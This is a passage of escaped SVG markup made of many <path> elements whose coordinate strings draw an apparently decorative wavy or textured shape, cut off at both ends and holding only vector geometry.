d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n        <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n        <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n        <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n        <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n        <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2